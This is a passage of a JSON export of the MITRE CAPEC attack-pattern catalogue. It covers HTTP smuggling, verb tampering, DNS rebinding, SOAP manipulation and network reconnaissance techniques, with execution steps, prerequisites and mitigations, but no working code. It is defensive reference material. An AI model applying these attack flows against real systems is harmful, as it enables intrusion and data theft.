characters, that could allow the injection of data into HTTP responses from Undertow to clients when used in tandem with a proxy; allowing for web-cache poisoning, XSS, and confidentiality violation of sensitive information from other HTTP requests sent to Undertow. See also: CVE-2017-2666"},{"p":"Mozilla Firefox and Thunderbird before 1.5.04, with various proxy servers, interpreted HTTP responses differently if HTTP response headers included a space between the header name and colon or if HTTP 1.1 headers were sent through a proxy configured with HTTP 1.0, allowing for HTTP Smuggling vulnerability. See also: CVE-2006-2786"}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"74"},{"CWE_ID":"436"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"27","Entry_Name":"HTTP Response Smuggling"}},"References":{"Reference":[{"External_Reference_ID":"REF-38"},{"External_Reference_ID":"REF-117"},{"External_Reference_ID":"REF-675"},{"External_Reference_ID":"REF-676"},{"External_Reference_ID":"REF-677"},{"External_Reference_ID":"REF-678"}]},"Notes":{"Note":["HTTP Splitting \u2013 \\"the act of forcing a sender of (HTTP) messages to emit data stream consisting of more messages than the sender\u2019s intension. The messages sent are 100% valid and RFC compliant\\" [REF-117].",{"Type":"Terminology"},"HTTP Smuggling \u2013 \\"the act of forcing a sender of (HTTP) messages to emit data stream which may be parsed as a different set of messages (i.e. dislocated message boundaries) than the sender\u2019s intention. This is done by virtue of forcing the sender to emit non-standard messages which can be interpreted in more than one way\\" [REF-117].",{"Type":"Terminology"},"HTTP Smuggling is an evolution of previous HTTP Splitting techniques which are commonly remediated against.",{"Type":"Relationship"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated @Status, Alternate_Terms, Consequences, Description, Example_Instances, Execution_Flow, Extended_Description, Indicators, Likelihood_Of_Attack, Mitigations, Notes, Prerequisites, References, Related_Attack_Patterns, Resources_Required, Skills_Required, Typical_Severity"}]}},"274":{"ID":"274","Name":"HTTP Verb Tampering","Abstraction":"Detailed","Status":"Draft","Description":"An attacker modifies the HTTP Verb (e.g. GET, PUT, TRACE, etc.) in order to bypass access restrictions. Some web environments allow administrators to restrict access based on the HTTP Verb used with requests. However, attackers can often provide a different HTTP Verb, or even provide a random string as a verb in order to bypass these protections. This allows the attacker to access data that should otherwise be protected.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"220","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The targeted system must attempt to filter access based on the HTTP verb used in requests."},"Resources_Required":{"Resource":"The attacker requires a tool that allows them to manually control the HTTP verb used to send messages to the targeted server."},"Mitigations":{"Mitigation":["Design: Ensure that only legitimate HTTP verbs are allowed.","Design: Do not use HTTP verbs as factors in access decisions."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"302"},{"CWE_ID":"654"}]},"References":{"Reference":{"External_Reference_ID":"REF-118"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}}},"275":{"ID":"275","Name":"DNS Rebinding","Abstraction":"Detailed","Status":"Draft","Description":"An adversary serves content whose IP address is resolved by a DNS server that the adversary controls. After initial contact by a web browser (or similar client), the adversary changes the IP address to which its name resolves, to an address within the target organization that is not publicly accessible. This allows the web browser to examine this internal address on behalf of the adversary. Web browsers enforce security zones based on DNS names in order to prevent cross-zone disclosure of information. Because the same name resolves to both these IP addresses, browsers will place both IP addresses in the same security zone and allow information to flow between the addresses. This allows adversaries to discover sensitive information about the internal network of an enterprise. If there is a trust relationship between the computer with the targeted browser and the internal machine the adversary identifies, additional attacks are possible. This attack differs from pharming attacks in that the adversary is the legitimate owner of the malicious DNS server and so does not need to compromise behavior of external DNS services.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"194","Exclude_Related":{"Exclude_ID":"403"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify potential DNS rebinding targets] An adversary publishes content on their own server with their own name and DNS server. Attract HTTP traffic and explore rebinding vulnerabilities in browsers, flash players of old version.","Technique":"Adversary uses Web advertisements to attract the victim to access adversary\'s DNS. Explore the versions of web browser or flash players in HTTP request."},{"Step":"2","Phase":"Experiment","Description":"[Establish initial target access to adversary DNS] The first time the target accesses the adversary\'s content, the adversary\'s name must be resolved to an IP address. The adversary\'s DNS server performs this resolution, providing a short Time-To-Live (TTL) in order to prevent the target from caching the value."},{"Step":"3","Phase":"Experiment","Description":"[Rebind DNS resolution to target address] The target makes a subsequent request to the adversary\'s content and the adversary\'s DNS server must again be queried, but this time the DNS server returns an address internal to the target\'s organization that would not be accessible from an outside source."},{"Step":"4","Phase":"Experiment","Description":"[Determine exploitability of DNS rebinding access to target address] The adversary can then use scripts in the content the target retrieved from the adversary in the original message to exfiltrate data from the named internal addresses."},{"Step":"5","Phase":"Exploit","Description":"[Access & exfiltrate data within the victim\'s security zone] The adversary can then use scripts in the content the target retrieved from the adversary in the original message to exfiltrate data from the internal addresses. This allows adversaries to discover sensitive information about the internal network of an enterprise.","Technique":["Adversary attempts to use victim\'s browser as an HTTP proxy to other resources inside the target\'s security zone. This allows two IP addresses placed in the same security zone.","Adversary tries to scan and access all internal hosts in victim\'s local network by sending multiple short-lived IP addresses."]}]},"Prerequisites":{"Prerequisite":"The target browser must access content server from the adversary controlled DNS name. Web advertisements are often used for this purpose. The target browser must honor the TTL value returned by the adversary and re-resolve the adversary\'s DNS name after initial contact."},"Skills_Required":{"Skill":["Setup DNS server and the adversary\'s web server. Write a malicious script to allow the victim to connect to the web server.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"The adversary must serve some web content that a victim accesses initially. This content must include executable content that queries the adversary\'s DNS name (to provide the second DNS resolution) and then performs the follow-on attack against the internal system. The adversary also requires a customized DNS server that serves an IP address for their registered DNS name, but which resolves subsequent requests by a single client to addresses internal to that client\'s network."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Design: IP Pinning causes browsers to record the IP address to which a given name resolves and continue using this address regardless of the TTL set in the DNS response. Unfortunately, this is incompatible with the design of some legitimate sites.","Implementation: Reject HTTP request with a malicious Host header.","Implementation: Employ DNS resolvers that prevent external names from resolving to internal addresses."]},"Example_Instances":{"Example":"The adversary registers a domain name, such as www.evil.com with IP address 1.3.5.7, delegates it to their own DNS server (1.3.5.2), and uses phishing links or emails to get HTTP traffic. Instead of sending a normal TTL record, the DNS server sends a very short TTL record (for example, 1 second), preventing DNS response of entry[www.evil.com, 1.3.5.7] from being cached on victim\'s (192.168.1.10) browser. The adversary\'s server first responds to the victim with malicious script such as JavaScript, containing IP address (1.3.5.7) of the server. The adversary uses XMLHttpRequest (XHR) to send HTTP request or HTTPS request directly to the adversary\'s server and load response. The malicious script allows the adversary to rebind the host name to the IP address (192.168.1.2) of a target server that is behind the firewall. Then the server responds to the adversary\'s real target, which is an internal host IP (192.168.1.2) in the same domain of the victim (192.168.1.10). Because the same name resolves to both these IP addresses, browsers will place both IP addresses (1.3.5.7 and 192.168.1.2) in the same security zone and allow information to flow between the addresses. Further, the adversary can achieve scanning and accessing all internal hosts in the victim\'s local network (192.168.X.X) by sending multiple short-lived IP addresses."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"350"}},"References":{"Reference":[{"External_Reference_ID":"REF-119"},{"External_Reference_ID":"REF-120","Section":"DNS rebinding"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Payload_Activation_Impact, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Payload, Related_Attack_Patterns, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description"}]}},"276":{"ID":"276","Name":"Inter-component Protocol Manipulation","Abstraction":"Standard","Status":"Draft","Description":"Inter-component protocols are used to communicate between different software and hardware modules within a single computer. Common examples are: interrupt signals and data pipes. Subverting the protocol can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"272"}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"707"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, Related_Weaknesses"}}},"277":{"ID":"277","Name":"Data Interchange Protocol Manipulation","Abstraction":"Standard","Status":"Draft","Description":"Data Interchange Protocols are used to transmit structured data between entities. These protocols are often specific to a particular domain (B2B: purchase orders, invoices, transport logistics and waybills, medical records). They are often, but not always, XML-based. Subverting the protocol can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"272"}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"707"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}]}},"278":{"ID":"278","Name":"Web Services Protocol Manipulation","Abstraction":"Standard","Status":"Draft","Description":"An adversary manipulates a web service related protocol to cause a web application or service to react differently than intended. This can either be performed through the manipulation of call parameters to include unexpected values, or by changing the called function to one that should normally be restricted or limited. By leveraging this pattern of attack, the adversary is able to gain access to data or resources normally restricted, or to cause the application or service to crash.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"272"}},"Prerequisites":{"Prerequisite":"The targeted application or service must rely on web service protocols in such a way that malicious manipulation of them can alter functionality."},"Resources_Required":{"Resource":"The attacker must be able to manipulate the communications to the targeted application or service."},"Mitigations":{"Mitigation":["Design: Range, size and value and consistency verification for any arguments supplied to applications and services from external sources and devise appropriate error response.","Design: Ensure that function calls that should not be called by an unprivileged user are not accessible to them."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"707"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}]}},"279":{"ID":"279","Name":"SOAP Manipulation","Abstraction":"Detailed","Status":"Draft","Description":"Simple Object Access Protocol (SOAP) is used as a communication protocol between a client and server to invoke web services on the server. It is an XML-based protocol, and therefore suffers from many of the same shortcomings as other XML-based protocols. Adversaries can make use of these shortcomings and manipulate the content of SOAP paramters, leading to undesirable behavior on the server and allowing the adversary to carry out a number of further attacks.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"278"},{"Nature":"CanPrecede","CAPEC_ID":"110"},{"Nature":"CanPrecede","CAPEC_ID":"228"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Exploit","Description":"[Find target application] The adversary needs to identify an application that uses SOAP as a communication protocol.","Technique":"Observe HTTP traffic to an application and look for SOAP headers."},{"Step":"2","Phase":"Experiment","Description":"[Detect Incorrect SOAP Parameter Handling] The adversary tampers with the SOAP message parameters and looks for indications that the tampering caused a change in behavior of the targeted application.","Technique":["Send more data than would seem reasonable for a field and see if the server complains.","Send nonsense data in a field that expects a certain subset, such as product names or sequence numbers, and see if the server complains.","Send XML metacharacters as data and see how the server responds."]},{"Step":"3","Phase":"Exploit","Description":"[Manipulate SOAP parameters] The adversary manipulates SOAP parameters in a way that causes undesirable behavior for the server. This can result in denial of service, information disclosure, arbitrary code exection, and more.","Technique":["Create a recursive XML payload that will take up all of the memory on the server when parsed, resulting in a denial of service. This is known as the billion laughs attack.","Insert XML metacharacters into data fields that could cause the server to go into an error state when parsing. This could lead to a denial of service.","Insert a large amount of data into a field that should have a character limit, causing a buffer overflow."]}]},"Prerequisites":{"Prerequisite":["An application uses SOAP-based web service api.","An application does not perform sufficient input validation to ensure that user-controllable data is safe for an XML parser.","The targeted server either fails to verify that data in SOAP messages conforms to the appropriate XML schema, or it fails to correctly handle the complete range of data allowed by the schema."]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands"}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"707"}},"References":{"Reference":{"External_Reference_ID":"REF-121"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description, Description Summary, Examples-Instances, References, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Example_Instances, Execution_Flow"}],"Previous_Entry_Name":["Soap Manipulation",{"Date":"2018-07-31"}]}},"285":{"ID":"285","Name":"ICMP Echo Request Ping","Abstraction":"Detailed","Status":"Stable","Description":"An adversary sends out an ICMP Type 8 Echo Request, commonly known as a \'Ping\', in order to determine if a target system is responsive. If the request is not blocked by a firewall or ACL, the target host will respond with an ICMP Type 0 Echo Reply datagram. This type of exchange is usually referred to as a \'Ping\' due to the Ping utility present in almost all operating systems. Ping, as commonly implemented, allows a user to test for alive hosts, measure round-trip time, and measure the percentage of packet loss. Performing this operation for a range of hosts on the network is known as a \'Ping Sweep\'. While the Ping utility is useful for small-scale host discovery, it was not designed for rapid or efficient host discovery over large network blocks. Other scanning utilities have been created that make ICMP ping sweeps easier to perform. Most networks filter ingress ICMP Type 8 messages for security reasons. Various other methods of performing ping sweeps have developed as a result. It is important to recognize the key security goal of the adversary is to discover if an IP address is alive, or has a responsive host. To this end, virtually any type of ICMP message, as defined by RFC 792 is useful. An adversary can cycle through various types of ICMP messages to determine if holes exist in the firewall configuration. When ICMP ping sweeps fail to discover hosts, other protocols can be used for the same purpose, such as TCP SYN or ACK segments, UDP datagrams sent to closed ports, etc.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The ability to send an ICMP type 8 query (Echo Request) to a remote target and receive an ICMP type 0 message (ICMP Echo Reply) in response. Any firewalls or access control lists between the sender and receiver must allow ICMP Type 8 and ICMP Type 0 messages in order for a ping operation to succeed."},"Skills_Required":{"Skill":["The adversary needs to know certain linux commands for this type of attack.",{"Level":"Low"}]},"Resources_Required":{"Resource":"Scanners or utilities that provide the ability to send custom ICMP queries."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other","Note":"A successful attack of this kind can identify open ports and available services on a system."}},"Mitigations":{"Mitigation":"Consider configuring firewall rules to block ICMP Echo requests and prevent replies. If not practical, monitor and consider action when a system has fast and a repeated pattern of requests that move incrementally through port numbers."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pp. 44-51"},{"External_Reference_ID":"REF-123"},{"External_Reference_ID":"REF-124"},{"External_Reference_ID":"REF-125"},{"External_Reference_ID":"REF-34","Section":"Section 3.5.2 Ping Scan (-SP), pg. 58"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attacker_Skills_or_Knowledge_Required, Description, Description Summary, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"287":{"ID":"287","Name":"TCP SYN Scan","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses a SYN scan to determine the status of ports on the remote target. SYN scanning is the most common type of port scanning that is used because of its many advantages and few drawbacks. As a result, novice attackers tend to overly rely on the SYN scan while performing system reconnaissance. As a scanning method, the primary advantages of SYN scanning are its universality and speed. RFC 793 defines the required behavior of any TCP/IP device in that an incoming connection request begins with a SYN packet, which in turn must be followed by a SYN/ACK packet from the receiving service. For this reason, like TCP Connect scanning, SYN scanning works against any TCP stack. Unlike TCP Connect scanning, it is possible to scan thousands of ports per second using this method. This type of scanning is usually referred to as \'half-open\' scanning because it does not complete the three-way handshake. The scanning rate is extremely fast because no time is wasted completing the handshake or tearing down the connection. This technique allows an attacker to scan through stateful firewalls due to the common configuration that TCP SYN segments for a new connection will be allowed for almost any port. TCP SYN scanning can also immediately detect 3 of the 4 important types of port status: open, closed, and filtered.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"300"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An adversary sends SYN packets to ports they want to scan and checks the response without completing the TCP handshake."},{"Step":"2","Phase":"Experiment","Description":"An adversary uses the response from the target to determine the port\'s state. The adversary can determine the state of a port based on the following responses. When a SYN is sent to an open port and unfiltered port, a SYN/ACK will be generated. When a SYN packet is sent to a closed port a RST is generated, indicating the port is closed. When SYN scanning to a particular port generates no response, or when the request triggers ICMP Type 3 unreachable errors, the port is filtered."}]},"Prerequisites":{"Prerequisite":"This scan type is not possible with some operating systems (Windows XP SP 2). On Linux and Unix systems it requires root privileges to use raw sockets."},"Resources_Required":{"Resource":"The ability to send TCP SYN segments to a host during network reconnaissance via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other","Note":"A successful attack of this kind can identify open ports and available services on a system."},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-34","Section":"Section 5.32 TCP SYN (Stealth) Scan, pg. 100"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Description, Description Summary, References, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Execution_Flow"}]}},"290":{"ID":"290","Name":"Enumerate Mail Exchange (MX) Records","Abstraction":"Detailed","Status":"Stable","Description":"An adversary enumerates the MX records for a given via a DNS query. This type of information gathering returns the names of mail servers on the network. Mail servers are often not exposed to the Internet but are located within the DMZ of a network protected by a firewall. A side effect of this configuration is that enumerating the MX records for an organization my reveal the IP address of the firewall or possibly other internal systems. Attackers often resort to MX record enumeration when a DNS Zone Transfer is not possible.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"309"}},"Prerequisites":{"Prerequisite":"The adversary requires access to a DNS server that will return the MX records for a network."},"Resources_Required":{"Resource":"A command-line utility or other application capable of sending requests to the DNS server is necessary."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pp. 38"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Related_Weaknesses"}}},"291":{"ID":"291","Name":"DNS Zone Transfers","Abstraction":"Detailed","Status":"Stable","Description":"An attacker exploits a DNS misconfiguration that permits a ZONE transfer. Some external DNS servers will return a list of IP address and valid hostnames. Under certain conditions, it may even be possible to obtain Zone data about the organization\'s internal network. When successful the attacker learns valuable information about the topology of the target organization, including information about particular servers, their role within the IT structure, and possibly information about the operating systems running upon the network. This is configuration dependent behavior so it may also be required to search out multiple DNS servers while attempting to find one with ZONE transfers allowed.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"309"}},"Prerequisites":{"Prerequisite":"Access to a DNS server that allows Zone transfers."},"Resources_Required":{"Resource":"A client application capable of interacting with the DNS server or a command-line utility or web application that automates DNS interactions."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pp. 34"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"}}},"292":{"ID":"292","Name":"Host Discovery","Abstraction":"Standard","Status":"Stable","Description":"An adversary sends a probe to an IP address to determine if the host is alive. Host discovery is one of the earliest phases of network reconnaissance. The adversary usually starts with a range of IP addresses belonging to a target network and uses various methods to determine if a host is present at that IP address. Host discovery is usually referred to as \'Ping\' scanning using a sonar analogy. The goal is to send a packet through to the IP address and solicit a response from the host. As such, a \'ping\' can be virtually any crafted packet whatsoever, provided the adversary can identify a functional host based on its response. An attack of this nature is usually carried out with a \'ping sweep,\' where a particular kind of ping is sent to a range of IP addresses.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169"}},"Prerequisites":{"Prerequisite":"The adversary requires logical access to the target network in order to carry out host discovery."},"Resources_Required":{"Resource":"The resources required will differ based upon the type of host discovery being performed. Usually a network scanning tool or scanning script is required due to the volume of requests that must be generated."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1018","Entry_Name":"Remote System Discovery"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 1: Footprinting, pp.44"},{"External_Reference_ID":"REF-34","Section":"Section 3.6 Host Discover Techniques, pg.57"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, References, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"293":{"ID":"293","Name":"Traceroute Route Enumeration","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses a traceroute utility to map out the route which data flows through the network in route to a target destination. Tracerouting can allow the adversary to construct a working topology of systems and routers by listing the systems through which data passes through on their way to the targeted machine. This attack can return varied results depending upon the type of traceroute that is performed. Traceroute works by sending packets to a target while incrementing the Time-to-Live field in the packet header. As the packet traverses each hop along its way to the destination, its TTL expires generating an ICMP diagnostic message that identifies where the packet expired. Traditional techniques for tracerouting involved the use of ICMP and UDP, but as more firewalls began to filter ingress ICMP, methods of traceroute using TCP were developed.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"309"}},"Prerequisites":{"Prerequisite":"A network capable of routing the attackers\' packets to the destination network."},"Resources_Required":{"Resource":"A command line version of traceroute or similar tool that performs route enumeration."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other"}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pp. 38-41"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Related_Weaknesses"}}},"294":{"ID":"294","Name":"ICMP Address Mask 